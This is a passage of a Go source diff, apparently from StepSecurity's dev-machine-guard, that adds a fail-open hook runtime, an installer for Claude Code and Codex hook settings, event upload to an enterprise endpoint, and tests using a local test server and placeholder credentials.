prev := errorLogPathOverride + errorLogPathOverride = "" + t.Cleanup(func() { errorLogPathOverride = prev }) + + if runtime.GOOS == "windows" { + t.Skip("HOME isn't the canonical home env var on Windows") + } + t.Setenv("HOME", "/tmp/fake-home") + + got := ErrorLogPath() + want := "/tmp/fake-home/.stepsecurity/ai-agent-hook-errors.jsonl" + if got != want { + t.Errorf("ErrorLogPath = %q, want %q", got, want) + } +} diff --git a/internal/aiagents/cli/hook.go b/internal/aiagents/cli/hook.go new file mode 100644 index 0000000..922409a --- /dev/null +++ b/internal/aiagents/cli/hook.go @@ -0,0 +1,144 @@ +// Package cli houses entry points for the AI-agent hooks domain: +// `hooks install`, `hooks uninstall`, and the hidden `_hook` runtime. +// +// The runtime entry point intentionally lives outside internal/cli so the +// hot path can bypass cli.Parse and logger construction — agents invoke +// `_hook` on every event and a non-zero exit is treated as a hook +// failure / block. RunHook calls config.Load itself for the upload gate; +// the bypass is everything else in main's startup path. Fail-open is a +// hard contract enforced here. +package cli + +import ( + "context" + "io" + "os" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/claudecode" + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/codex" + aieventc "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/hook" + "github.com/step-security/dev-machine-guard/internal/aiagents/ingest" + "github.com/step-security/dev-machine-guard/internal/config" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// RunHook is the hidden `_hook ` entry point. +// +// Contract (enforced by hook_test.go and main_test.go): +// - returns 0 on every code path, including malformed args, unknown agents, +// unparseable stdin, and internal panics +// - writes nothing to stdout unless emitting a valid agent-allow response +// - writes nothing to stderr on the success path +// +// args is os.Args[2:] — i.e., everything after the `_hook` verb. Two +// positional args are required (agent, hookEvent) and any additional or +// missing args fail-open silently. +func RunHook(stdin io.Reader, stdout, stderr io.Writer, args []string) int { + defer func() { + // Last-line defense: a panic anywhere in the runtime must still + // translate to exit 0 with no stdout. The recover swallows any + // stack trace so it never leaks to the agent. + _ = recover() + }() + + if len(args) != 2 { + return 0 + } + agent, hookEvent := args[0], args[1] + if agent == "" || hookEvent == "" { + return 0 + } + + ad := adapterForHookAgent(agent) + if ad == nil { + return 0 + } + + // Load process-wide config so ingest.Snapshot below sees the + // per-user credentials persisted by `configure`. Load is a silent + // no-op when the file is missing or malformed; the snapshot gate + // is the only thing that decides whether upload runs. + config.Load() + + rt := hook.NewRuntime(ad) + rt.Stdin = stdin + rt.Stdout = stdout + rt.Stderr = stderr + rt.Exec = executor.NewReal() + rt.LogError = AppendError + rt.UploadEvent = uploaderFactory() + + // Bound the entire invocation by the same cap the runtime would + // apply internally. Doubling the bound here is intentional: it lets + // a hung deferred response emit still complete inside the agent's + // own hook timeout. + ctx, cancel := context.WithTimeout(context.Background(), 2*hook.CapHook+1*time.Second) + defer cancel() + + _ = rt.Run(ctx, aieventc.HookEvent(hookEvent)) + return 0 +} + +// uploaderFactory is the seam RunHook uses to obtain the upload +// closure. Production points it at newUploader, which reads +// process-wide config and constructs an ingest.Client. Tests override +// it to keep _hook invocations from reaching the real network or +// reading a developer's per-user config. +var uploaderFactory = newUploader + +// newUploader builds the per-invocation upload seam used by the hook +// runtime. It returns nil — i.e., upload disabled — whenever enterprise +// config is missing or incomplete; the runtime treats nil as a no-op +// rather than an error, preserving the fail-open contract. When config +// is valid, the returned closure POSTs a single-element batch to the +// AI-agents endpoint and surfaces the transport error to the runtime, +// which logs it to errors.jsonl with the event_id. +func newUploader() func(context.Context, aieventc.Event) error { + cfg, ok := ingest.Snapshot() + if !ok { + return nil + } + client, ok := ingest.New(cfg, nil) + if !ok { + return nil + } + customerID := cfg.CustomerID + return func(ctx context.Context, ev aieventc.Event) error { + return client.UploadEvents(ctx, customerID, []aieventc.Event{ev}) + } +} + +// adapterForHookAgent maps the `_hook ` argument onto a +// constructed adapter. Returns nil for any unknown agent — the caller +// translates that to an exit-0 fail-open path. Constructed with the +// real user home directory and a self-resolved binary path so any +// adapter behavior that depends on those (e.g., logging the running +// binary) is consistent with what `hooks install` would have written. +func adapterForHookAgent(agent string) adapter.Adapter { + home, err := os.UserHomeDir() + if err != nil { + // No home → adapters that compute settings paths from $HOME + // would fail. Returning nil here short-circuits to the fail-open + // path; adapters that don't need home (none today) would still + // be reachable when one is added. + return nil + } + binaryPath, err := Resolve() + if err != nil { + // Self-path resolution failed (e.g., /proc unavailable). The + // adapter only uses the binary path for ShellCommand outputs, + // none of which are read on the hot path; an empty string keeps + // the runtime functional. + binaryPath = "" + } + switch agent { + case claudecode.AgentName: + return claudecode.New(home, binaryPath) + case codex.AgentName: + return codex.New(home, binaryPath) + } + return nil +} diff --git a/internal/aiagents/cli/hook_test.go b/internal/aiagents/cli/hook_test.go new file mode 100644 index 0000000..ce03a73 --- /dev/null +++ b/internal/aiagents/cli/hook_test.go @@ -0,0 +1,254 @@ +package cli + +import ( + "bytes" + "context" + "encoding/json" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "testing" + "time" + + aieventc "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/config" +) + +// withStubUploader replaces uploaderFactory with a capturing factory for +// the duration of the test. RunHook calls config.Load(), which mutates +// process-wide config globals from a developer's real +// ~/.stepsecurity/config.json — so we also snapshot-and-restore those +// globals to keep tests isolated from each other and from the host. +// The returned slice records every event the runtime tried to upload. +func withStubUploader(t *testing.T) *[]aieventc.Event { + t.Helper() + prev := uploaderFactory + var mu sync.Mutex + captured := make([]aieventc.Event, 0) + uploaderFactory = func() func(context.Context, aieventc.Event) error { + return func(_ context.Context, ev aieventc.Event) error { + mu.Lock() + defer mu.Unlock() + captured = append(captured, ev) + return nil + } + } + prevCID, prevEP, prevAK := config.CustomerID, config.APIEndpoint, config.APIKey + t.Cleanup(func() { + uploaderFactory = prev + config.CustomerID = prevCID + config.APIEndpoint = prevEP + config.APIKey = prevAK + }) + return &captured +} + +// TestRunHook_FailOpenContract asserts the fail-open contract on every +// ERROR path: exit 0, empty stdout, empty stderr. Adding parsing, stdin +// handling, policy evaluation, and upload paths must not introduce any +// non-zero exit or any stderr noise on these inputs. +// +// Valid calls (well-formed agent + event) are deliberately excluded: +// they're a different contract — exit 0 + a valid agent-allow JSON body +// on stdout — and belong in a separate wire-format test added with 2.8. +func TestRunHook_FailOpenContract(t *testing.T) { + withStubUploader(t) + cases := []struct { + name string + args []string + }{ + {"no args", nil}, + {"only agent", []string{"claude-code"}}, + {"only agent (codex)", []string{"codex"}}, + {"unsupported agent", []string{"windsurf", "PreToolUse"}}, + {"empty agent", []string{"", "PreToolUse"}}, + {"empty event", []string{"claude-code", ""}}, + {"trailing extras", []string{"claude-code", "PreToolUse", "extra", "args"}}, + } + + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + var stdout, stderr bytes.Buffer + rc := RunHook(bytes.NewReader(nil), &stdout, &stderr, tc.args) + if rc != 0 { + t.Errorf("expected exit 0 (fail-open contract), got %d", rc) + } + if stdout.Len() != 0 { + t.Errorf("expected empty stdout on error path, got %q", stdout.String()) + } + if stderr.Len() != 0 { + t.Errorf("expected empty stderr on error path, got %q", stderr.String()) + } + }) + } +} + +// TestRunHook_ValidPayloadEmitsAllow exercises the wire-format contract +// for well-formed inputs: a recognized agent + event with a parseable +// payload returns exit 0 and emits a valid JSON allow response on stdout. +// This pins the success path that the fail-open test deliberately +// excludes. +func TestRunHook_ValidPayloadEmitsAllow(t *testing.T) { + withStubUploader(t) + cases := []struct { + name string + agent string + hookEvent string + payload string + // expectAllowKey is "continue" for Claude (non-empty allow body) + // and "" for Codex (allow body is the empty object {}). + expectAllowKey string + }{ + { + name: "claude-code PreToolUse Bash", + agent: "claude-code", + hookEvent: "PreToolUse", + payload: `{"tool_name":"Bash","tool_input":{"command":"ls"}}`, + expectAllowKey: "continue", + }, + { + name: "codex PreToolUse Bash", + agent: "codex", + hookEvent: "PreToolUse", + payload: `{"tool_name":"Bash","tool_input":{"command":"ls"}}`, + expectAllowKey: "", + }, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + var stdout, stderr bytes.Buffer + rc := RunHook(strings.NewReader(tc.payload), &stdout, &stderr, []string{tc.agent, tc.hookEvent}) + if rc != 0 { + t.Errorf("expected exit 0, got %d", rc) + } + if stderr.Len() != 0 { + t.Errorf("expected empty stderr, got %q", stderr.String()) + } + body := bytes.TrimSpace(stdout.Bytes()) + var resp map[string]any + if err := json.Unmarshal(body, &resp); err != nil { + t.Fatalf("stdout not valid JSON: %v: %q", err, body) + } + if tc.expectAllowKey != "" && resp[tc.expectAllowKey] != true { + t.Errorf("expected %q=true in allow response, got %v", tc.expectAllowKey, resp) + } + if tc.expectAllowKey == "" && len(resp) != 0 { + t.Errorf("expected empty-object allow response, got %v", resp) + } + }) + } +} + +// TestRunHook_RealUploadWiring exercises the full upload path without +// the uploaderFactory stub: RunHook → config.Load → newUploader → +// ingest.Client → httptest.Server. This is the only test that proves +// config-staged credentials actually drive a real POST through the +// wire-format we ship; the seam-stubbed tests intentionally +// short-circuit before that wiring. +func TestRunHook_RealUploadWiring(t *testing.T) { + type captured struct { + method string + path string + auth string + ua string + body []byte + } + gotCh := make(chan captured, 1) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + body, _ := io.ReadAll(r.Body) + gotCh <- captured{ + method: r.Method, + path: r.URL.Path, + auth: r.Header.Get("Authorization"), + ua: r.Header.Get("User-Agent"), + body: body, + } + w.WriteHeader(http.StatusAccepted) + })) + t.Cleanup(srv.Close) + + // Stage credentials BEFORE config.Load runs inside RunHook. Load + // only overrides placeholder (`{{...}}`) globals, so these stay put. + prevCID, prevEP, prevAK := config.CustomerID, config.APIEndpoint, config.APIKey + config.CustomerID = "cus_e2e" + config.APIEndpoint = srv.URL + config.APIKey = "sk_e2e_secret" + t.Cleanup(func() { + config.CustomerID = prevCID + config.APIEndpoint = prevEP + config.APIKey = prevAK + }) + + // Deliberately do NOT call withStubUploader — we want the real + // uploaderFactory → newUploader → ingest.New path to run. + var stdout, stderr bytes.Buffer + rc := RunHook( + strings.NewReader(`{"tool_name":"Bash","tool_input":{"command":"ls"}}`), + &stdout, &stderr, + []string{"claude-code", "PreToolUse"}, + ) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + + var got captured + select { + case got = <-gotCh: + case <-time.After(3 * time.Second): + t.Fatal("no upload received within 3s — wiring broken") + } + + if got.method != http.MethodPost { + t.Errorf("method=%s, want POST", got.method) + } + if got.path != "/v1/cus_e2e/ai-agents/events" { + t.Errorf("path=%q, want /v1/cus_e2e/ai-agents/events", got.path) + } + if got.auth != "Bearer sk_e2e_secret" { + t.Errorf("auth=%q", got.auth) + } + if !strings.HasPrefix(got.ua, "dmg/") { + t.Errorf("user-agent=%q, want dmg/", got.ua) + } + var arr []map[string]any + if err := json.Unmarshal(got.body, &arr); err != nil { + t.Fatalf("body not JSON array: %v: %q", err, got.body) + } + if len(arr) != 1 { + t.Fatalf("expected 1 event, got %d: %v", len(arr), arr) + } + if arr[0]["customer_id"] != "cus_e2e" { + t.Errorf("event.customer_id=%v, want cus_e2e", arr[0]["customer_id"]) + } + if arr[0]["hook_event"] != string(aieventc.HookPreToolUse) { + t.Errorf("event.hook_event=%v, want %q", arr[0]["hook_event"], aieventc.HookPreToolUse) + } +} + +// TestRunHook_InvokesUploaderSeam pins the upload wiring: a valid +// `_hook claude-code PreToolUse` invocation must dispatch through +// uploaderFactory(). The factory itself decides whether a real upload +// happens (it returns nil when enterprise config is missing); this +// test only checks that the runtime calls the seam the factory +// returns. +func TestRunHook_InvokesUploaderSeam(t *testing.T) { + captured := withStubUploader(t) + + var stdout, stderr bytes.Buffer + rc := RunHook( + strings.NewReader(`{"tool_name":"Bash","tool_input":{"command":"ls"}}`), + &stdout, &stderr, + []string{"claude-code", "PreToolUse"}, + ) + if rc != 0 { + t.Fatalf("exit = %d, want 0", rc) + } + if len(*captured) != 1 { + t.Fatalf("uploader called %d times, want 1", len(*captured)) + } + if (*captured)[0].HookEvent != aieventc.HookPreToolUse { + t.Errorf("uploaded event hook=%q, want PreToolUse", (*captured)[0].HookEvent) + } +} diff --git a/internal/aiagents/cli/install.go b/internal/aiagents/cli/install.go new file mode 100644 index 0000000..1e47df2 --- /dev/null +++ b/internal/aiagents/cli/install.go @@ -0,0 +1,131 @@ +package cli + +import ( + "context" + "fmt" + "io" + "strings" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/ingest" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// resolveBinary is the seam install/uninstall use to obtain the +// absolute, symlink-resolved DMG binary path. Production calls +// Resolve(); tests override to avoid depending on a real on-disk +// binary or to drive the resolver-failure branch. +var resolveBinary = Resolve + +// RunInstall is the entry point for `hooks install`. +// +// agent is the --agent flag value; "" means "every detected agent". +// stdout/stderr are the writers main wires from os.Stdout/os.Stderr. +// +// Returns the desired process exit code: +// - 0 on success, idempotent no-op, no agents detected, or the +// root-with-no-console-user no-op. +// - 1 on enterprise-config gate failure, self-path resolution +// failure, unsupported --agent, or any adapter Install error. +// +// Flow: +// 1. enterprise-config gate (all three credentials present and +// non-placeholder) +// 2. resolve target user (root + no console user → log + exit 0) +// 3. resolve absolute, symlink-resolved DMG binary path +// 4. select adapters per --agent or detection on $PATH +// 5. per-adapter Install, then chown all outputs to target user +// under root +// 6. emit per-adapter summary to stdout +// +// Adapter Install errors don't abort the loop — the remaining +// adapters still get a chance. The aggregate exit code is 1 if any +// adapter failed. +func RunInstall(ctx context.Context, exec executor.Executor, agent string, stdout, stderr io.Writer) int { + if _, ok := ingest.Snapshot(); !ok { + fmt.Fprintln(stderr, "Enterprise configuration not found or incomplete.") + fmt.Fprintln(stderr, "Run `stepsecurity-dev-machine-guard configure` to set customer_id, api_endpoint, and api_key.") + AppendError("install", "enterprise_config_missing", "ingest.Snapshot returned not-ok", "") + return 1 + } + + target, ok := ResolveTargetUser(exec, stderr) + if !ok { + return 0 + } + + binaryPath, err := resolveBinary() + if err != nil { + fmt.Fprintf(stderr, "stepsecurity-dev-machine-guard: cannot resolve own binary path: %v\n", err) + AppendError("install", "selfpath_failed", err.Error(), "") + return 1 + } + + adapters, err := selectAdapters(ctx, agent, target.HomeDir, binaryPath, exec) + if err != nil { + fmt.Fprintf(stderr, "stepsecurity-dev-machine-guard: %v\n", err) + AppendError("install", "select_adapters_failed", err.Error(), "") + return 1 + } + if len(adapters) == 0 { + fmt.Fprintln(stdout, "No supported AI coding agents detected on $PATH.") + fmt.Fprintf(stdout, "Pass --agent to install for a specific agent (supported: %s).\n", + strings.Join(SupportedAgents, ", ")) + return 0 + } + + exit := 0 + for _, a := range adapters { + res, err := a.Install(ctx) + if err != nil { + fmt.Fprintf(stderr, "%s: install failed: %v\n", a.Name(), err) + AppendError("install", "adapter_install_failed", + fmt.Sprintf("%s: %v", a.Name(), err), "") + exit = 1 + // Skip chown on failure: the partial state is already + // inconsistent, and a chown sweep can't unbreak it. + continue + } + // Under root, chown every file written or created + // (settings, .dmg-*.bak siblings, parent dirs). + // ChownToTarget short-circuits to a no-op when not root. + ChownToTarget(exec, installChownPaths(res), target) + printInstallResult(stdout, a.Name(), res) + } + return exit +} + +// installChownPaths is the chown sweep set for a single adapter's +// InstallResult. Order is shallowest-parent-first (CreatedDirs are +// pushed by the adapter in that order) so a recursive chown could +// stop at a parent without revisiting children — though the current +// helper chowns each entry individually. +func installChownPaths(r adapter.InstallResult) []string { + out := make([]string, 0, len(r.CreatedDirs)+len(r.WrittenFiles)+len(r.BackupFiles)) + out = append(out, r.CreatedDirs...) + out = append(out, r.WrittenFiles...) + out = append(out, r.BackupFiles...) + return out +} + +// printInstallResult renders one adapter's InstallResult for the +// user. The format is intentionally line-oriented rather than tabular +// so partial output during multi-agent installs reads naturally. +func printInstallResult(w io.Writer, name string, r adapter.InstallResult) { + fmt.Fprintf(w, "%s:\n", name) + if len(r.HooksAdded) > 0 { + fmt.Fprintf(w, " added: %v\n", r.HooksAdded) + } + if len(r.HooksKept) > 0 { + fmt.Fprintf(w, " unchanged: %v\n", r.HooksKept) + } + for _, f := range r.WrittenFiles { + fmt.Fprintf(w, " wrote: %s\n", f) + } + for _, f := range r.BackupFiles { + fmt.Fprintf(w, " backup: %s\n", f) + } + for _, n := range r.Notes { + fmt.Fprintf(w, " note: %s\n", n) + } +} diff --git a/internal/aiagents/cli/install_test.go b/internal/aiagents/cli/install_test.go new file mode 100644 index 0000000..f548009 --- /dev/null +++ b/internal/aiagents/cli/install_test.go @@ -0,0 +1,368 @@ +package cli + +import ( + "bytes" + "context" + "errors" + "os" + "path/filepath" + "runtime" + "strings" + "testing" + + "github.com/step-security/dev-machine-guard/internal/config" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// withEnterpriseConfig stages valid (non-empty, non-placeholder) values +// in the package-level config vars that ingest.Snapshot reads, restoring +// the previous values on cleanup. Tests using this helper must not run +// in parallel — config vars are package-level state. +func withEnterpriseConfig(t *testing.T) { + t.Helper() + prevCID, prevEP, prevAK := config.CustomerID, config.APIEndpoint, config.APIKey + config.CustomerID = "cust-test" + config.APIEndpoint = "https://api.example.com" + config.APIKey = "secret-test" + t.Cleanup(func() { + config.CustomerID = prevCID + config.APIEndpoint = prevEP + config.APIKey = prevAK + }) +} + +// withResolveBinary overrides the install-time selfpath resolver with a +// fixed value (or error). The default Resolve() reads os.Executable +// which under `go test` points at the test binary — fine in principle, +// but pinning a known value keeps the hook commands written to settings +// readable in failure output. +func withResolveBinary(t *testing.T, fn func() (string, error)) { + t.Helper() + prev := resolveBinary + resolveBinary = fn + t.Cleanup(func() { resolveBinary = prev }) +} + +const fakeBinary = "/usr/local/bin/stepsecurity-dev-machine-guard" + +func okBinary() (string, error) { return fakeBinary, nil } + +// newInstallMock returns a Mock executor configured as a non-root user +// whose home is `home`. Callers add SetPath entries for the agents they +// want detected. +func newInstallMock(t *testing.T, home string) *executor.Mock { + t.Helper() + m := executor.NewMock() + m.SetIsRoot(false) + m.SetUsername("alice") + m.SetHomeDir(home) + return m +} + +func TestRunInstall_NoEnterpriseConfig_Exit1(t *testing.T) { + logPath := withErrorLog(t) + // Leave config vars as their default placeholders ({{...}}) — no + // withEnterpriseConfig call. ingest.Snapshot returns ok=false on + // placeholders. + + var stdout, stderr bytes.Buffer + m := executor.NewMock() + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "Enterprise configuration not found") { + t.Errorf("stderr missing diagnostic, got: %q", stderr.String()) + } + data, err := os.ReadFile(logPath) + if err != nil { + t.Fatalf("expected errors log entry: %v", err) + } + if !strings.Contains(string(data), "enterprise_config_missing") { + t.Errorf("errlog missing code, got: %q", string(data)) + } +} + +func TestRunInstall_PlaceholderConfig_Exit1(t *testing.T) { + withErrorLog(t) + // Explicitly stage a placeholder in one field — the stricter gate + // must reject build-time placeholders even when the other two + // values look valid. + prevCID, prevEP, prevAK := config.CustomerID, config.APIEndpoint, config.APIKey + config.CustomerID = "cust-1" + config.APIEndpoint = "{{API_ENDPOINT}}" + config.APIKey = "secret" + t.Cleanup(func() { + config.CustomerID = prevCID + config.APIEndpoint = prevEP + config.APIKey = prevAK + }) + + var stdout, stderr bytes.Buffer + m := executor.NewMock() + if rc := RunInstall(context.Background(), m, "", &stdout, &stderr); rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } +} + +func TestRunInstall_RootNoConsoleUser_Exit0(t *testing.T) { + withEnterpriseConfig(t) + logPath := withErrorLog(t) + withResolveBinary(t, okBinary) + + m := executor.NewMock() + m.SetIsRoot(true) + // "root" simulates the executor failing to resolve a console user. + m.SetUsername("root") + m.SetHomeDir("/var/root") + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("root + no console user: exit = %d, want 0", rc) + } + if !strings.Contains(stderr.String(), "no console user") { + t.Errorf("stderr missing the bail note, got: %q", stderr.String()) + } + // errors.jsonl should record the bail. + data, err := os.ReadFile(logPath) + if err != nil { + t.Fatalf("expected errlog entry on root-no-console-user: %v", err) + } + if !strings.Contains(string(data), "no_console_user") { + t.Errorf("errlog missing no_console_user code, got: %q", string(data)) + } +} + +func TestRunInstall_SelfPathFails_Exit1(t *testing.T) { + withEnterpriseConfig(t) + logPath := withErrorLog(t) + withResolveBinary(t, func() (string, error) { + return "", errors.New("mock selfpath failure") + }) + + home := t.TempDir() + m := newInstallMock(t, home) + + var stdout, stderr bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &stdout, &stderr); rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "cannot resolve own binary path") { + t.Errorf("stderr missing diagnostic, got: %q", stderr.String()) + } + if data, _ := os.ReadFile(logPath); !strings.Contains(string(data), "selfpath_failed") { + t.Errorf("errlog missing selfpath_failed code, got: %q", string(data)) + } +} + +func TestRunInstall_UnsupportedAgent_Exit1(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "cursor", &stdout, &stderr) + if rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "unsupported agent") { + t.Errorf("stderr missing unsupported-agent diagnostic, got: %q", stderr.String()) + } +} + +func TestRunInstall_NoAgentsDetected_Exit0(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) // no SetPath, nothing detected + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (no detection is not an error)", rc) + } + out := stdout.String() + if !strings.Contains(out, "No supported AI coding agents detected") { + t.Errorf("stdout missing no-detected message, got: %q", out) + } + // User should learn about the --agent escape hatch and the agent + // names — without that they have no way to recover from a buggy + // detection result. + if !strings.Contains(out, "--agent") || !strings.Contains(out, "claude-code") || !strings.Contains(out, "codex") { + t.Errorf("stdout missing --agent escape-hatch hint, got: %q", out) + } +} + +func TestRunInstall_InstallsClaudeCode(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + + settings := filepath.Join(home, ".claude", "settings.json") + data, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("expected settings file written at %s: %v", settings, err) + } + // The hook command must include the resolved binary path AND the + // canonical `_hook claude-code` invocation prefix — that's what + // uninstall later matches against. + if !strings.Contains(string(data), fakeBinary+" _hook claude-code") { + t.Errorf("settings missing hook command, got: %s", string(data)) + } + + out := stdout.String() + if !strings.Contains(out, "claude-code:") { + t.Errorf("stdout missing claude-code header, got: %q", out) + } + if !strings.Contains(out, "added:") { + t.Errorf("stdout missing added hooks line, got: %q", out) + } + if !strings.Contains(out, "wrote:") { + t.Errorf("stdout missing wrote line, got: %q", out) + } +} + +func TestRunInstall_InstallsBoth(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + m.SetPath("codex", "/usr/local/bin/codex") + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + + for _, p := range []string{ + filepath.Join(home, ".claude", "settings.json"), + filepath.Join(home, ".codex", "hooks.json"), + filepath.Join(home, ".codex", "config.toml"), + } { + if _, err := os.Stat(p); err != nil { + t.Errorf("expected file written: %s (err=%v)", p, err) + } + } + + out := stdout.String() + // Per-adapter sections appear in declaration order: claude-code first. + if claudeIdx, codexIdx := strings.Index(out, "claude-code:"), strings.Index(out, "codex:"); claudeIdx == -1 || codexIdx == -1 || claudeIdx > codexIdx { + t.Errorf("expected claude-code section before codex; got: %q", out) + } +} + +func TestRunInstall_ExplicitAgentSkipsDetection(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + // PATH is empty — but --agent codex is an unconditional opt-in. + m := newInstallMock(t, home) + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "codex", &stdout, &stderr) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + if _, err := os.Stat(filepath.Join(home, ".codex", "hooks.json")); err != nil { + t.Errorf("expected codex hooks.json: %v", err) + } + // Claude must NOT have been touched. + if _, err := os.Stat(filepath.Join(home, ".claude", "settings.json")); !os.IsNotExist(err) { + t.Errorf("claude settings should not exist on explicit --agent codex; err=%v", err) + } +} + +func TestRunInstall_IdempotentReinstall(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var out1 bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &out1, &bytes.Buffer{}); rc != 0 { + t.Fatalf("first install exit = %d", rc) + } + + settings := filepath.Join(home, ".claude", "settings.json") + first, err := os.ReadFile(settings) + if err != nil { + t.Fatal(err) + } + + var out2 bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &out2, &bytes.Buffer{}); rc != 0 { + t.Fatalf("second install exit = %d", rc) + } + + second, err := os.ReadFile(settings) + if err != nil { + t.Fatal(err) + } + // A reinstall pretty-prints into canonical formatting; what we + // care about is byte-stability across two reinstalls — that + // confirms upsertHook produced no spurious diff after settling. + if !bytes.Equal(first, second) { + t.Errorf("settings drifted between reinstalls:\n--- first ---\n%s\n--- second ---\n%s", string(first), string(second)) + } + + // Second run's stdout should report the entries as unchanged. + if !strings.Contains(out2.String(), "unchanged:") { + t.Errorf("second-install stdout missing 'unchanged:' line, got: %q", out2.String()) + } +} + +// TestRunInstall_UsesTargetUserHomeNotProcessHome pins the wiring +// between ResolveTargetUser and selectAdapters: the install must +// target the resolved user's home, not the calling process's $HOME. +// Plugging the mock home into a path that os.UserHomeDir would never +// return is the cheapest way to verify which path actually got used. +func TestRunInstall_UsesTargetUserHomeNotProcessHome(t *testing.T) { + if runtime.GOOS == "windows" { + // The test home contains characters Windows accepts but the + // rest of the suite already covers Mac/Linux paths cleanly. + t.Skip("path-shape assertion is Unix-flavored") + } + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := filepath.Join(t.TempDir(), "explicit-target-home") + if err := os.MkdirAll(home, 0o755); err != nil { + t.Fatal(err) + } + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var stdout, stderr bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("exit = %d (stderr=%q)", rc, stderr.String()) + } + if _, err := os.Stat(filepath.Join(home, ".claude", "settings.json")); err != nil { + t.Errorf("install did not write under target-user home: %v", err) + } +} diff --git a/internal/aiagents/cli/rootuser.go b/internal/aiagents/cli/rootuser.go new file mode 100644 index 0000000..a59a425 --- /dev/null +++ b/internal/aiagents/cli/rootuser.go @@ -0,0 +1,91 @@ +package cli + +import ( + "fmt" + "io" + "os" + "os/user" + "strconv" + + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// TargetUser identifies the user whose home `hooks install` should +// target. UID/GID are split out so `ChownToTarget` doesn't have to +// re-parse them on each path. +type TargetUser struct { + User *user.User + UID int + GID int + HomeDir string +} + +// ResolveTargetUser determines whose home directory the install should +// modify. It's the only sanctioned way for install handlers to obtain a +// user — in particular, callers must NOT walk /etc/passwd or read +// $SUDO_USER directly. +// +// Behavior: +// - non-root caller: returns the calling user; ok=true. +// - root caller, console user resolved: returns the console user; ok=true. +// - root caller, no console user resolved: writes a one-line note to +// stderr, appends an entry to the errors log, and returns ok=false. +// The caller MUST exit 0 in this case — multi-user machines without +// an active console session aren't a hook-install error, just a +// no-op. +func ResolveTargetUser(exec executor.Executor, stderr io.Writer) (TargetUser, bool) { + u, err := exec.LoggedInUser() + if err != nil || u == nil { + if exec.IsRoot() { + noConsoleUser(stderr, fmt.Sprintf("LoggedInUser returned err=%v", err)) + } + return TargetUser{}, false + } + + // Under root, executor.LoggedInUser falls back to the current user + // (root) when it can't resolve the console user. Treat root-as-target + // as "no console user found" — installing hooks into root's home + // would write into a profile no human uses interactively. + if exec.IsRoot() && (u.Username == "" || u.Username == "root") { + noConsoleUser(stderr, "executor.LoggedInUser returned root under root caller") + return TargetUser{}, false + } + + uid, _ := strconv.Atoi(u.Uid) + gid, _ := strconv.Atoi(u.Gid) + return TargetUser{ + User: u, + UID: uid, + GID: gid, + HomeDir: u.HomeDir, + }, true +} + +func noConsoleUser(stderr io.Writer, detail string) { + const note = "stepsecurity-dev-machine-guard: running as root with no console user; nothing to install." + fmt.Fprintln(stderr, note) + AppendError("install", "no_console_user", detail, "") +} + +// ChownToTarget chowns each path to the target user's UID/GID. It's a +// best-effort helper: any individual chown failure is logged to the +// errors file and the 